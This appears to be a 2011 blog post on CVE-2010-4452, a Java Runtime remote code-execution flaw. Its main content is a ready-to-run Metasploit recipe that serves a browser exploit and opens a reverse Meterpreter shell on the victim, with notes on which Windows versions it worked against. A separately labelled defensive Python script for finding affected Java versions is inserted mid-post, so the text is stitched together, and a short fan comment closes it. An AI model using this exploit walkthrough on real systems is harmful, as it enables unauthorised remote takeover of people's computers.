Saturday, 30 April 2011
JAVA CVE-2010-4452
CVE: CVE-2010-4452
Remote: Yes
Local: No
Published: Feb 15 2011 12:00AM
Updated: Apr 19 2011 08:45PM
Description: Oracle Java is prone to a remote code-execution vulnerability in Java Runtime Environment. An attacker can exploit this issue to execute arbitrary code with SYSTEM-level privileges. This vulnerability affects the following supported versions: 6 Update 23 and lower.
To exploit it, you can use the following syntax in Metasploit:
use windows/browser/java_codebase_trust
set SRVHOST 192.168.1.69
set SRVPORT 80
set URIPATH /
set PAYLOAD java/meterpreter/reverse_tcp
set LHOST 192.168.1.69
set LPORT 8888
exploit
Then open up the client browser and open the URL http://192.168.1.69/
You should get your shell!
I tested on Windows XP and Windows 7, both worked fine, but it didn't work on Ubuntu.
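On the defensive side, the affected range given in the description ("6 Update 23 and lower") can be checked against an inventory of `java -version` banners. The following is an added example, not part of the original post; the host names, banners and function names are constructed for illustration, and it only judges the range the post states.

```python
import re

# Range taken from the post's description: 6 Update 23 and lower.
AFFECTED_FAMILY = 6
LAST_AFFECTED_UPDATE = 23

# Version token in `java -version` output, e.g. java version "1.6.0_23"
_VERSION_RE = re.compile(r'version "(\d+)\.(\d+)\.\d+(?:_(\d+))?')

def parse_java_version(banner):
    """Return (family, update) from a `java -version` banner, or None."""
    m = _VERSION_RE.search(banner)
    if not m:
        return None
    major, minor, update = int(m.group(1)), int(m.group(2)), int(m.group(3) or 0)
    # Legacy scheme: "1.6.0_23" means family 6; newer scheme: "11.0.2" means family 11.
    family = minor if major == 1 else major
    return family, update

def classify(banner):
    """Classify one banner against the range stated in the post."""
    parsed = parse_java_version(banner)
    if parsed is None:
        return "unknown"            # unparseable: needs manual review
    family, update = parsed
    if family != AFFECTED_FAMILY:
        return "other-family"       # outside what the post's statement covers
    return "affected" if update <= LAST_AFFECTED_UPDATE else "later-update"

def affected_hosts(inventory):
    """Return sorted host names whose banner falls in the stated range."""
    return sorted(h for h, b in inventory.items() if classify(b) == "affected")

# Constructed sample inventory (hypothetical hosts and banners).
SAMPLE = {
    "ws-xp-01": 'java version "1.6.0_23"',
    "ws-w7-02": 'java version "1.6.0_24"',
    "ws-w7-03": 'java version "1.6.0"',
    "build-01": 'openjdk version "11.0.2" 2019-01-15',
    "kiosk-09": "command not found",
}

if __name__ == "__main__":
    for host, banner in sorted(SAMPLE.items()):
        print(host, classify(banner))
```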
hi...
I am Gaurav Garg from How To Hack A Computer
I like your web site or all available content but I like this post the most..
thanks for providing this information in this open way..
Regards
Gaurav garg
Keep Posting
Have A Nice day